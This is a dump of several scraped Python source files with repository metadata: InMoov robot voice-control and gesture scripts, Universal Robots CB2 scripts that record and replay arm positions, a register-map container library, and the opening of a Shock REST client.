ear.addCommand("da vinci", inMoov.getName(), "daVinci")
# "manual" disables every phrase except "voice control", which re-enables them.
ear.addCommand("manual", ear.getName(), "lockOutAllGrammarExcept", "voice control")
ear.addCommand("voice control", ear.getName(), "clearLock")
ear.addCommand("stop listening", ear.getName(), "stopListening")
# "ok" dispatches to the Python service's ok() function defined below.
ear.addCommand("ok", "python", "ok")
ear.addComfirmations("yes","correct","yeah","ya")  # NOTE(review): "addComfirmations" (sic) -- presumably the MRL API spells it this way; confirm
ear.addNegations("no","wrong","nope","nah")
ear.startListening()
def ok():
    # Gesture callback invoked by the ear service when "ok" is heard
    # (registered above via ear.addCommand("ok", "python", "ok")).
    # Sets per-joint speeds first, then moves head, arms and hands.
    inMoov.setHandSpeed("left", 0.30, 0.30, 1.0, 1.0, 1.0, 1.0)
    inMoov.setHandSpeed("right", 1.0, 1.0, 1.0, 1.0, 1.0, 1.0)
    inMoov.setArmSpeed("left", 0.75, 0.75, 0.75, 0.95)
    inMoov.setArmSpeed("right", 1.0, 1.0, 1.0, 1.0)
    inMoov.setHeadSpeed(0.65, 0.75)
    inMoov.moveHead(88,79)
    inMoov.moveArm("left",89,75,93,11)
    inMoov.moveArm("right",0,91,28,17)
    inMoov.moveHand("left",92,106,4,0,0,34)
    inMoov.moveHand("right",86,51,133,162,153,180)
| {
"repo_name": "sujitbehera27/MyRoboticsProjects-Arduino",
"path": "src/resource/Python/examples/InMoov.full.py",
"copies": "3",
"size": "2973",
"license": "apache-2.0",
"hash": 5072647497137523000,
"line_mean": 38.64,
"line_max": 124,
"alpha_frac": 0.7285570131,
"autogenerated": false,
"ratio": 2.675967596759676,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9831587738568146,
"avg_score": 0.014587374258305892,
"num_lines": 75
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
inMoov = Runtime.createAndStart("inMoov", "InMoov")
# attach an arduino to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
# set COM number according to the com of your Arduino board
inMoov.attachArduino("right","uno","COM13")
inMoov.attachHand("right")
# setting speech's language
# regrettably voice recognition is only in
# English
# inMoov.setLanguage("fr")
# inMoov.setLanguage("it")
inMoov.setLanguage("en")
# system check
inMoov.systemCheck()
inMoov.rest()
# listen for these key words
# NOTE(review): recognized phrases are presumably delivered to heard()
# below by the MRL ear service -- confirm against the MRL version in use.
inMoov.startListening("rest | open hand | close hand | one | two | three | four | five | manual | voice control| capture gesture")
# voice control
def heard():
    # Speech-recognition callback: echo the phrase, then dispatch it.
    data = msg_ear_recognized.data[0]
    print "heard ", data
    #mouth.setLanguage("fr")
    mouth.speak("you said " + data)
    if (data == "rest"):
        inMoov.rest()
    elif (data == "open hand"):
        inMoov.handOpen("right")
    elif (data == "close hand"):
        inMoov.handClose("right")
    elif (data == "manual"):
        # Disable everything except the phrase that re-enables listening.
        inMoov.lockOutAllGrammarExcept("voice control")
    elif (data == "voice control"):
        inMoov.clearGrammarLock()
    elif (data == "capture gesture"):
        inMoov.captureGesture();
        inMoov.moveHand("right",50,28,30,10,10,90)
def gestureOne():
    # Canned pose: raise one finger ("one"); moves head, both arms and
    # both hands to fixed servo positions.
    inMoov.moveHead(90,90)
    inMoov.moveArm("left",90,64,128,43)
    inMoov.moveArm("right",0,73,29,15)
    inMoov.moveHand("left",50,28,30,10,10,90)
    inMoov.moveHand("right",10,10,10,10,10,90)
"repo_name": "DarkRebel/myrobotlab",
"path": "src/resource/Python/examples/InMoov.right.hand.py",
"copies": "2",
"size": "1926",
"license": "apache-2.0",
"hash": 6884017166681605000,
"line_mean": 9.5536723164,
"line_max": 130,
"alpha_frac": 0.6490134995,
"autogenerated": false,
"ratio": 2.568,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.42170134995,
"avg_score": null,
"num_lines": null
} |
# a basic script for starting the InMoov service
# and attaching the right hand
# an Arduino is required, additionally a computer
# with a microphone and speakers is needed for voice
# control and speech synthesis
inMoov = Runtime.createAndStart("inMoov", "InMoov")
# attach an arduino to InMoov
# possible board types include uno atmega168 atmega328p atmega2560 atmega1280 atmega32u4
# the MRLComm.ino sketch must be loaded into the Arduino for MyRobotLab control
# set COM number according to the com of your Arduino board
inMoov.attachArduino("right","uno","COM13")
inMoov.attachHand("right")
# setting speech's language
# regrettably voice recognition is only in
# English
# inMoov.setLanguage("fr")
# inMoov.setLanguage("it")
inMoov.setLanguage("en")
# system check
inMoov.systemCheck()
inMoov.rest()
# listen for these key words
# NOTE(review): recognized phrases are presumably delivered to heard()
# below by the MRL ear service -- confirm against the MRL version in use.
inMoov.startListening("rest | open hand | close hand | one | two | three | four | five | manual | voice control| capture gesture")
def heard():
data = msg_ear_recognized.data[0]
print "heard ", data
#mouth.setLanguage("fr")
mouth.speak("you said " + data)
if (data == "rest"):
inMoov.rest()
elif (data == "open hand"):
inMoov.handOpen("right")
elif (data == "close hand"):
inMoov.handClose("right")
elif (data == "manual"):
inMoov.lockOutAllGrammarExcept("voice control")
elif (data == "voice control"):
inMoov.clearGrammarLock()
elif (data == "capture gesture"):
inMoov.captureGesture();
inMoov.moveHand("right",50,28,30,10,10,90)
def gestureOne():
    # Canned pose: raise one finger ("one"); moves head, both arms and
    # both hands to fixed servo positions.
    inMoov.moveHead(90,90)
    inMoov.moveArm("left",90,64,128,43)
    inMoov.moveArm("right",0,73,29,15)
    inMoov.moveHand("left",50,28,30,10,10,90)
    inMoov.moveHand("right",10,10,10,10,10,90)
"repo_name": "mecax/pyrobotlab",
"path": "toSort/InMoov.right.hand.py",
"copies": "1",
"size": "1985",
"license": "apache-2.0",
"hash": -2543813005616323600,
"line_mean": 7.1652542373,
"line_max": 130,
"alpha_frac": 0.6297229219,
"autogenerated": false,
"ratio": 2.453646477132262,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8385566688936028,
"avg_score": 0.03956054201924683,
"num_lines": 60
} |
"""A basic script to demonstrate usage of the cb2_receive module.
There are a few lines which are commented out. Uncomment these lines to see a
demonstration of the parallel nature of the cb2_receive module."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import time
from contextlib import closing
import cb2_receive
import argparse
def main():
    """Parse CLI args, connect to the robot and stream status forever.

    The URReceiver is started with verbose output enabled, so robot
    state is printed to the terminal; the loop below only keeps the
    process alive (Ctrl-C to exit).
    """
    # Parse in arguments
    parser = argparse.ArgumentParser(
        description='Save Points',
        epilog="This software is designed to show the status of a UR CB2 Robot."
               " Simply run the program with appropriate arguments and it will"
               " print useful information about the robot to the terminal."
               " If information is not printed nicely, make your terminal "
               "larger")
    parser.add_argument("--ip", metavar="ip", type=str,
                        help='IP address of the robot', default="192.168.1.100")
    parser.add_argument("--port", metavar="port", type=int,
                        help='IP port on the robot', default=30003)
    args = parser.parse_args()
    host = args.ip    # The remote host
    port = args.port  # The same port as used by the server
    # closing() guarantees the socket is shut down even on an exception.
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\
            as robot_socket:
        robot_socket.connect((host, port))
        with cb2_receive.URReceiver(robot_socket, True) as my_ur_receiver:
            my_ur_receiver.start()
            # some_num = 0
            while True:
                # print "\n\n" + str(some_num) + "\n\n"
                # some_num += 1
                time.sleep(.25)
if __name__ == "__main__":
    main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/receive/cb2_receive_example.py",
"copies": "1",
"size": "2728",
"license": "mit",
"hash": 2564842185178229000,
"line_mean": 39.1176470588,
"line_max": 80,
"alpha_frac": 0.6755865103,
"autogenerated": false,
"ratio": 4.229457364341085,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5405043874641086,
"avg_score": null,
"num_lines": null
} |
"""A basic script to move to stored points for a cb2 robot.
Basic Usage: Store points using cb2_store_points.py (cb2-record from the
terminal). Run this script, with commandline args."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import cb2_robot
import json
import time
def main():
    """Read previously saved joint points from a JSON file and replay
    them on the robot in ascending numeric order."""
    # Parse in arguments
    parser = argparse.ArgumentParser(
        description='Replay points from json',
        epilog="This software is designed to move a cb2 robot to points which "
               "have been previously saved.")
    parser.add_argument("-f", "--file", metavar="file", type=str,
                        help='The file to read data from.',
                        default="cb2points.json")
    parser.add_argument("--ip", metavar="ip", type=str,
                        help='IP address of the robot', default="192.168.1.100")
    parser.add_argument("--port", metavar="port", type=int,
                        help='IP port on the robot', default=30003)
    args = parser.parse_args()
    host = args.ip    # The remote host
    port = args.port  # The same port as used by the server
    with open(args.file, 'r') as f:
        data = json.load(f)
    write_time = data['time']
    points = data['points']
    print 'read in {} points, written at: {}'.format(len(points.keys()),
                                                     write_time)
    with cb2_robot.URRobot(host, port) as robot:
        # JSON keys are stringified ints; sort numerically, not lexically.
        for number in sorted([int(x) for x in points.keys()]):
            robot.add_goal(cb2_robot.Goal(points[str(number)]['joint'], False,
                                          'joint'))
            # TODO: this appears to skip the first point!
            robot.move_on_stop()
            print 'Beginning move: {}'.format(number)
if __name__ == "__main__":
    main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/cb2_move_to_points.py",
"copies": "1",
"size": "2871",
"license": "mit",
"hash": 729776699600088700,
"line_mean": 40.0142857143,
"line_max": 80,
"alpha_frac": 0.6485545106,
"autogenerated": false,
"ratio": 4.209677419354839,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0008818342151675485,
"num_lines": 70
} |
"""A basic script to store points from a cb2 robot
Basic Usage: Run the script, with commandline args. Press `c` to capture a
point. Press `s` to save and exit."""
# The MIT License (MIT)
#
# Copyright (c) 2016 GTRC.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import socket
import time
import argparse
import cb2_receive
import json
import sys
from contextlib import closing
def main():
    """Interactively capture robot poses and save them to a JSON file.

    [c] captures the current cartesian + joint position from the robot's
    status stream; [s] writes all captured points to the file and exits.
    """
    # Parse in arguments
    parser = argparse.ArgumentParser(
        description='Save Points',
        epilog="This software is designed to save points from a cb2 robot to a"
               " file for future use. Points are saved as both joint and"
               " cartesian points to the designated file. Once the program is "
               "running, press [c] to capture a point and press [s] to save"
               " the file and exit.")
    parser.add_argument("-f", "--file", metavar="file", type=str,
                        help='The file to save data to.',
                        default="cb2points.json")
    parser.add_argument("--ip", metavar="ip", type=str,
                        help='IP address of the robot', default="192.168.1.100")
    parser.add_argument("--port", metavar="port", type=int,
                        help='IP port on the robot', default=30003)
    args = parser.parse_args()
    # Check to make sure that we can access the file
    # (fail fast, before any points have been captured).
    try:
        f = open(args.file, 'w')
        print "Able to access file, closing it now until we are ready for it."
    except IOError:
        print "Unable to access file, bailing out."
        sys.exit("Unable to access file")
    f.close()
    host = args.ip    # The remote host
    port = args.port  # The same port as used by the server
    print 'trying to connect to: {}:{}'.format(host, port)
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM))\
            as robot_socket:
        robot_socket.connect((host, port))
        with cb2_receive.URReceiver(robot_socket, False) as my_ur_receiver:
            my_ur_receiver.start()
            run = True
            point_count = 0
            json_dict = dict()
            json_dict['time'] = time.time()
            json_dict['points'] = dict()
            while run:
                try:
                    key_input = str(raw_input('Input:'))
                except ValueError:
                    print ("Input was not valid. You must input either [c] or"
                           " [s]")
                    key_input = None
                if key_input is not None:
                    if key_input in ('c', 'C'):
                        # Snapshot under the receiver's lock so cartesian and
                        # joint data come from the same status packet.
                        with my_ur_receiver.lock:
                            json_dict['points'][point_count] = \
                                {'cartesian': my_ur_receiver.position,
                                 'joint': my_ur_receiver.actual_joint_positions}
                        point_count += 1
                    elif key_input in ('s', 'S'):
                        run = False
                    else:
                        print ("Input was not valid. You must input either [c]"
                               " or [s]")
    with open(args.file, 'w') as f:
        json.dump(json_dict, f, indent=4)
if __name__ == "__main__":
    main()
| {
"repo_name": "IRIM-Technology-Transition-Lab/ur_cb2",
"path": "ur_cb2/receive/cb2_store_points.py",
"copies": "1",
"size": "4270",
"license": "mit",
"hash": -2380545605268792300,
"line_mean": 39.6666666667,
"line_max": 80,
"alpha_frac": 0.5866510539,
"autogenerated": false,
"ratio": 4.34826883910387,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009450695421159555,
"num_lines": 105
} |
# A basic set of container classes for register data
# Gordon McGregor gordon.mcgregor@verilab.com
from json import dump, load
from pprint import pprint
__version__ = '0.1a'
class __register_base(object):
    """Shared plumbing for register-map container objects.

    Subclasses supply keys(); iteration, display and hashing are all
    derived from it.
    """

    def __init__(self, parent, name='undefined'):
        self.parent = parent
        self.name = name

    def __str__(self):
        return self.name

    def __hash__(self):
        return hash(str(self))

    def __dir__(self):
        return self.children()

    def __iter__(self):
        # Yield a wrapped child object for every child name.
        for child_name in self.children():
            yield self.__get_child__(child_name)

    def __repr__(self):
        return str(self.children())

    def show(self, verbose=False):
        # Pretty-print the sorted child names.  `verbose` is accepted
        # for interface compatibility but currently unused.
        names = self.__dir__()
        names.sort()
        pprint(names)

    def children(self):
        return self.keys()

    def keys(self):
        # Subclasses must override this with a real name list.
        raise RegisterError("Implement keys")
def load_map(map_name):
    """Load a JSON register description file and wrap it in a RegisterMap.

    The resulting map is named after the file's name with the extension
    stripped (text before the first '.').
    """
    # Use a context manager so the file handle is closed promptly;
    # the original left the handle open until garbage collection.
    with open(map_name) as map_file:
        register_data = load(map_file)
    return RegisterMap(register_data, map_name.split(".")[0])
class RegisterError(Exception):
    """Raised for invalid lookups anywhere in the register-map hierarchy."""

    def __init__(self, value):
        Exception.__init__(self)
        self.value = value  # payload describing what went wrong

    def __str__(self):
        return repr(self.value)
class RegisterMap:
    """Top-level view of a register description dictionary.

    Attribute access by region name yields RegisterBlock or Memory
    wrappers, driven by the 'default_map' section of register_data.
    """

    def __init__(self, register_data, name='undefined'):
        self.register_data = register_data
        self.name = name

    def __dir__(self):
        return self.register_blocks()

    def __iter__(self):
        # Walk the map, yielding one wrapper object per region.
        for block_name in self.register_blocks():
            yield self.__getattr__(block_name)

    def __str__(self):
        return self.name

    def __hash__(self):
        return hash(str(self))

    def __repr__(self):
        return str(self.register_blocks())

    def __getattr__(self, attr):
        # Dispatch unknown attribute names to region wrappers.  A falsy
        # attribute name silently yields None (original behaviour).
        if not attr:
            return None
        if self.is_register_block(attr):
            return RegisterBlock(self, attr)
        if self.is_memory(attr):
            return Memory(self, attr)
        raise RegisterError("Block is unknown "+ attr)

    def is_register_block(self, name):
        # True when `name` is declared as a register_block region.
        try:
            region = self.register_data['default_map'][name]
            return region['region_type'] == 'register_block'
        except:
            return False

    def is_memory(self, name):
        # True when `name` is declared as a memory region.
        try:
            region = self.register_data['default_map'][name]
            return region['region_type'] == 'memory'
        except:
            return False

    def register_blocks(self):
        return self.keys()

    def keys(self):
        # Sorted list of region names (Python 2: dict.keys() is a list).
        names = self.register_data['default_map'].keys()
        names.sort()
        return names
class RegisterBlock(__register_base):
    """A named block of registers inside a RegisterMap.

    Attribute access by register name (block.status) returns Register
    wrappers; get_*/is_* helpers are reachable without the prefix via
    __getattr__ (e.g. block.base -> get_base()).
    """
    def __init__(self, parent, name = 'undefined'):
        # parent is the owning RegisterMap; the block type keys into
        # register_data['register_blocks'] for register definitions.
        self.parent = parent
        self.register_block_type = self.parent.register_data['default_map'][name]['register_block_type']
        self.name = name
    def __dir__(self):
        return self.registers()
    def __iter__(self):
        # Yield a Register wrapper for each register in this block.
        for i in self.registers(numerical_sort=True):
            yield self.__get_register(i)
    def __get_register(self, name):
        # Register(parent_block, register_map, name).
        return Register(self, self.parent, name)
    def __str__(self):
        return self.name
    def __hash__(self):
        return self.__str__().__hash__()
    def __repr__(self):
        return str(self.registers())
    def __getattr__(self, attr):
        # Dispatcher: is_<attr>()/get_<attr>() helpers first, otherwise
        # treat the attribute as a register name.
        if self.__class__.__dict__.has_key('is_' + attr):
            return getattr(self, 'is_' + attr)()
        if self.__class__.__dict__.has_key('get_' + attr):
            return getattr(self, 'get_' + attr)()
        return self.__get_register(attr)
    def get_base(self):
        """Base address of this block from the default_map entry."""
        try:
            return self.parent.register_data['default_map'][self.name]['base']
        except(KeyError):
            # NOTE(review): register_data is a dict, so calling it as
            # register_data(self.name) looks wrong (TypeError) -- probably
            # meant has_key/'in'.  Left as-is; confirm before fixing.
            if not self.parent.register_data(self.name):
                raise RegisterError('unknown register block: ' + self.name)
            else:
                raise RegisterError("register block " + self.name + " has no base entry")
    def is_memory(self):
        return False
    def is_register_block(self):
        return True
    def registers(self, numerical_sort=False):
        """Return register names; `numerical_sort` is currently a no-op
        (the address-ordered sort below is commented out)."""
        try:
            data = self.parent.register_data['register_blocks'][self.register_block_type]['registers'].keys()
#            if numerical_sort:
#                data.sort(cmp = lambda x,y: cmp( Register(self, self.parent, x).get_address(), Register(self, self.parent, y).get_address()) )
#            else:
#                data.sort()
            return data
        except(KeyError):
            raise RegisterError('unknown register block: ' + self.name)
    def keys(self):
        # Keys of the block-type definition (e.g. 'registers', ...).
        try:
            return self.parent.register_data['register_blocks'][self.register_block_type].keys()
        except(KeyError):
            raise RegisterError('unknown register_block: ' + self.name)
class Register(__register_base):
    """A single register inside a RegisterBlock.

    Field access by name (reg.field1) returns Field wrappers; the
    get_*/is_* helpers are also reachable without their prefix via
    __getattr__ (e.g. reg.addr -> get_addr()).
    """

    def __init__(self, parent=None, register_map=None, name='undefined'):
        self.parent = parent              # owning RegisterBlock
        self.register_map = register_map  # top-level RegisterMap
        self.name = name

    def _entry(self):
        """The raw JSON dict describing this register (may raise KeyError)."""
        block_type = self.parent.register_block_type
        return self.register_map.register_data['register_blocks'][block_type]['registers'][self.name]

    def __dir__(self):
        return self.fields()

    def __iter__(self):
        for field_name in self.fields():
            yield self.__get_field(field_name)

    def fields(self):
        """Return this register's field names (unsorted dict order)."""
        block_type = self.parent.register_block_type
        registers = self.register_map.register_data['register_blocks'][block_type]['registers']
        return registers[self.name]['fields'].keys()

    def __str__(self):
        return '.'.join((self.register_map.name, self.parent.name, self.name))

    def __hash__(self):
        return self.__str__().__hash__()

    def __eq__(self, other):
        return self.__str__() == other.__str__()

    def __repr__(self):
        return str(self.fields())

    def __getattr__(self, attr):
        # Basic dispatcher logic - check for get_<attr>() and is_<attr>()
        # methods, then the 'desc' shortcut, then fall back to fields.
        if ('get_' + attr) in self.__class__.__dict__:
            return getattr(self, 'get_' + attr)()
        if ('is_' + attr) in self.__class__.__dict__:
            return getattr(self, 'is_' + attr)()
        if attr == 'desc':
            try:
                # BUGFIX: previously read the undefined self.reg_map_entry;
                # look the register's own entry up instead.
                return self._entry()['desc'][0]
            except(KeyError):
                raise RegisterError('unknown register: ' + self.name)
        return self.__get_field(attr)

    def get_base(self):
        """Base address of the enclosing block."""
        return self.parent.get_base()

    def __get_field(self, name):
        if name in self.fields():
            return Field(self, self.parent, self.register_map, name)
        else:
            raise RegisterError(self.name + ' register does not have a field ' + name)

    def get_offset(self):
        """Byte offset of this register within its block."""
        try:
            # BUGFIX: the original indexed via the nonexistent
            # self.register_block attribute and skipped the 'registers'
            # level of the schema (compare fields() above).
            return self._entry()['offset']
        except(KeyError):
            raise RegisterError('unknown register: ' + self.name)

    def get_type(self):
        """Access-type string for this register (e.g. 'RW', 'RO', 'WOC').

        Added because is_writeable()/is_readable() call get_type(), which
        did not exist.  Assumes the register entry carries a 'type' key --
        TODO confirm against the JSON schema.
        """
        try:
            return self._entry()['type']
        except(KeyError):
            raise RegisterError('unknown register: ' + self.name)

    def get_length(self):
        return 4  # hack for now - should calculate?

    def is_writeable(self):
        # Anything other than RO is writeable (RW, WOC, WOT).
        type = self.get_type()
        if type.find("RW") != -1 or type.find("WO") != -1:
            return True
        else:
            return False

    def is_readable(self):
        # Write-only registers cannot be read back.
        type = self.get_type()
        if type.find("WO") != -1:
            return False
        else:
            return True

    def is_memory(self):
        return False

    def is_register(self):
        return True

    def get_addr(self):
        """Absolute address: block base plus register offset."""
        return self.parent.get_base() + self.get_offset()
class Memory(__register_base):
    """A raw memory region in the map (no registers or fields).

    Iterating a Memory yields nothing; unknown attributes fall back to
    raw keys of the region's entry in the map data.
    """

    def __init__(self, parent, name='undefined'):
        self.parent = parent  # owning RegisterMap
        self.name = name

    def __str__(self):
        return self.name

    def __iter__(self):
        # A memory region has no children to iterate over.
        return self

    def next(self):
        raise StopIteration

    def __hash__(self):
        return hash(str(self))

    def __repr__(self):
        return self.name

    def __getattr__(self, attr):
        # Prefer explicit get_/is_ helpers, then raw map-entry keys.
        cls_dict = self.__class__.__dict__
        if ('get_' + attr) in cls_dict:
            return getattr(self, 'get_' + attr)()
        if ('is_' + attr) in cls_dict:
            return getattr(self, 'is_' + attr)()
        try:
            return self.parent.register_data[self.name][attr]
        except(KeyError):
            raise RegisterError('unknown region: ' + self.name)

    def is_memory(self):
        return True

    def is_register_block(self):
        return False

    def is_register(self):
        return False

    def get_base(self):
        """Find the base address for this memory region"""
        try:
            return self.parent.register_data[self.name]['base']
        except(KeyError):
            # Distinguish "region unknown" from "region lacks a base".
            if self.name in self.parent.register_data:
                raise RegisterError("memory " + self.name + " has no base entry")
            raise RegisterError('unknown region: ' + self.name)
# return Field(self, self.parent, self.register_map, name)
class Field(__register_base):
    """A bit field within a Register.

    Raw field attributes from the JSON description (lsb, width, ...)
    are reachable directly via __getattr__ (e.g. field.lsb).
    """

    def __init__(self, parent=None, register_block=None, register_map=None, name='undefined'):
        self.parent = parent                  # owning Register
        self.register_block = register_block  # owning RegisterBlock
        self.register_map = register_map      # top-level RegisterMap
        self.name = name

    def __str__(self):
        return '.'.join((self.register_map.name, self.register_block.name, self.parent.name, self.name))

    def __hash__(self):
        return self.__str__().__hash__()

    def __eq__(self, other):
        return self.__str__() == other.__str__()

    def __repr__(self):
        return str(self.__str__())

    def __getattr__(self, attr):
        # Dispatcher: prefer explicit get_/is_ helpers, then fall back
        # to raw keys of the field's JSON entry.
        if ('get_' + attr) in self.__class__.__dict__:
            return getattr(self, 'get_' + attr)()
        if ('is_' + attr) in self.__class__.__dict__:
            return getattr(self, 'is_' + attr)()
        try:
            return self.get_key(attr)
        except(KeyError):
            raise RegisterError('unknown field: ' + self.name + ' attr: ' + attr)

    def get_valid(self):
        """Return the (min, max) valid range, or ('all', 'all')."""
        try:
            ranges = self.get_key('valid')
        except(KeyError):
            ranges = 'all'
        # BUGFIX: was "ranges is 'all'" -- identity comparison only holds
        # for interned literals, not for strings loaded from JSON.
        if ranges == 'all':
            return ('all', 'all')
        else:
            return (min(ranges), max(ranges))

    def get_lsb(self):
        return self.get_key('lsb')

    def get_width_format_string(self):
        # Hex format string wide enough for the field, e.g. width 12 -> "0x%03x".
        return "0x%%0%dx" % ( (self.get_key('width')+3)/4 )

    def get_key(self, attr='lsb'):
        """Raw lookup of one attribute of this field's JSON entry."""
        return self.register_map.register_data['register_blocks'][self.register_block.register_block_type]['registers'][self.parent.name]['fields'][self.name][attr]

    def get_mask(self):
        """Bit mask covering this field within the full register value."""
        width = self.get_key('width')
        lsb = self.get_key('lsb')
        # Equivalent to OR-ing each bit in a loop, without the loop.
        return ((1 << width) - 1) << lsb

    def extract_value(self, value=0xff):
        """Extract this field's value from a full register value."""
        return (value & self.get_mask()) >> self.get_lsb()
# Ad-hoc smoke test (Python 2): loads test_data.json, exercises
# attribute-style navigation, then dumps every field of every
# register block in the map.
if __name__ == '__main__':
    print 'test code here'
    register_map = load_map("test_data.json")
    # Attribute access walks map -> block -> register -> field.
    block = register_map.bank1
    register = block.status
    field = block.status.field1
    for block in register_map:
        if block.is_register_block():
            for register in block:
                for field in register:
                    print field
        else:
            print block, "is memory"
| {
"repo_name": "GordonMcGregor/reg_model",
"path": "reg_data.py",
"copies": "1",
"size": "11699",
"license": "apache-2.0",
"hash": 6011507577058336000,
"line_mean": 28.4685138539,
"line_max": 164,
"alpha_frac": 0.5397042482,
"autogenerated": false,
"ratio": 4.01889385091034,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.505859809911034,
"avg_score": null,
"num_lines": null
} |
"""A basic Shock (https://github.com/MG-RAST/Shock) python access class.
Authors:
* Jared Wilkening
* Travis Harrison
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import cStringIO
import os
import requests
import urllib
from requests_toolbelt import MultipartEncoder
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class Client:
    """Minimal Shock REST client built on `requests` + requests_toolbelt.

    All calls raise Exception on transport errors or when Shock returns
    an error payload; most successful calls return the 'data' member of
    Shock's standard {status, data, error} response envelope.
    """
    # Class-level defaults; overwritten per instance in __init__.
    shock_url = ''
    auth_header = {}
    token = ''
    # Template for reporting caught exceptions.
    template = "An exception of type {0} occured. Arguments:\n{1!r}"
    # Dispatch table mapping HTTP verb names to requests functions.
    methods = { 'get': requests.get,
                'put': requests.put,
                'post': requests.post,
                'delete': requests.delete }
    def __init__(self, shock_url, token=''):
        """Remember the server URL and, if given, set the auth token."""
        self.shock_url = shock_url
        if token != '':
            self.set_auth(token)
    def set_auth(self, token):
        """Build the OAuth Authorization header from a token string."""
        self.auth_header = {'Authorization': 'OAuth %s'%token}
    def get_acl(self, node):
        """Return the full ACL document of a node."""
        return self._manage_acl(node, 'get')
    def add_acl(self, node, acl, user):
        """Grant `user` the given acl type on a node."""
        return self._manage_acl(node, 'put', acl, user)
    def delete_acl(self, node, acl, user):
        """Revoke `user`'s acl type on a node."""
        return self._manage_acl(node, 'delete', acl, user)
    def _manage_acl(self, node, method, acl=None, user=None):
        # Shared implementation for ACL get/put/delete.
        url = self.shock_url+'/node/'+node+'/acl'
        if acl and user:
            url += '/'+acl+'?users='+urllib.quote(user)
        try:
            req = self.methods[method](url, headers=self.auth_header)
        except Exception as ex:
            message = self.template.format(type(ex).__name__, ex.args)
            raise Exception(u'Unable to connect to Shock server %s\n%s' %(url, message))
        if not (req.ok and req.text):
            raise Exception(u'Unable to connect to Shock server %s: %s' %(url, req.raise_for_status()))
        rj = req.json()
        # Sanity-check that the reply follows Shock's response envelope.
        if not (rj and isinstance(rj, dict) and all([key in rj for key in ['status','data','error']])):
            raise Exception(u'Return data not valid Shock format')
        if rj['error']:
            raise Exception('Shock error %s: %s'%(rj['status'], rj['error'][0]))
        return rj['data']
    def get_node(self, node):
        """Fetch one node document by id."""
        return self._get_node_data('/'+node)
    def query_node(self, query):
        """Query nodes; `query` is a dict of attribute filters."""
        query_string = '?query&'+urllib.urlencode(query)
        return self._get_node_data(query_string)
